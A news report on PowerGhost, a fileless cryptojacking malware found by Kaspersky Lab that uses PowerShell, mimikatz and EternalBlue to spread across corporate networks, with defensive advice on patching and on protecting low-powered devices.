Researchers have uncovered a cryptojacking campaign that looks to spread across infected networks to ensure as much mining profit as possible.
A new form of cryptocurrency-mining malware is targeting corporate networks across the world, employing a combination of PowerShell and EternalBlue to stealthily spread.
Dubbed PowerGhost, the fileless malware can secretly embed itself on a single system on a network then spread to other PCs and servers across organisations.
The cryptojacker has been uncovered by researchers at security company Kaspersky Lab, who detected it on corporate networks across the globe, with the largest concentration of infections in India, Brazil, Columbia, and Turkey. PowerGhost has also been detected across Europe and North America.
Cryptocurrency mining malware secretly uses the power of infected systems to mine for cryptocurrency, which is sent to the attackers’ wallet. The more machines that are infected, the more illicit profits the attackers can make.
Infections begin with the use of exploits or remote administration tools such as Windows Management Instrumentation. PowerGhost also uses fileless techniques to discreetly go about its business and ensure it isn’t detected on the network.
By adopting this tactic, the PowerGhost miner isn’t stored directly on the hard drive of the infected machine, making it harder to detect.
PowerGhost itself is an obfuscated PowerShell script which contains add-on modules for the miner’s operation such as mimikatz, which helps it obtain account credentials of infected machines, as well as a shellcode for deploying the notorious EternalBlue exploit to spread around the network.
EternalBlue is the leaked NSA hacking tool which went on to power the WannaCry and NotPetya attacks, and it’s still being used by crooks over a year later.
After one machine is infected with PowerGhost, EternalBlue can spread it around the rest of the network, then with the aid of mimikatz it can steal credentials, aiding its spread and allowing the escalation of privileges using CVE-2018-8120.
Once PowerGhost is embedded onto machines, it can perform its task of mining for cryptocurrency — and detection rates for the malware suggest that those behind it are particularly keen to compromise corporate networks in order to make as much money as quickly as possible.
“PowerGhost raises new concerns about crypto-mining software. The miner we examined indicates that targeting consumers is not enough for cybercriminals anymore – threat actors are now turning their attention to enterprises too. Crypto-currency mining is set to become a huge threat to the business community,” said David Emm, principal security researcher at Kaspersky Lab.
Researchers note that one version of PowerGhost can also be used for conducting DDoS attacks, something which those behind the malware are likely to be using as an additional means of income.
Cryptocurrency mining malware has risen to become one of the most popular means of cybercriminals making money, even surpassing ransomware when it comes to turning a profit.
To avoid corporate networks falling victim to mining malware, researchers recommend software is kept patched and up to date in order to prevent miners exploiting known vulnerabilities like EternalBlue.
Organisations are also urged to not overlook less obvious targets for attacks such as queue management systems, POS terminals, and vending machines, because cryptojackers don’t need much power to operate, so can easily take advantage of these often-forgotten about, low-powered systems.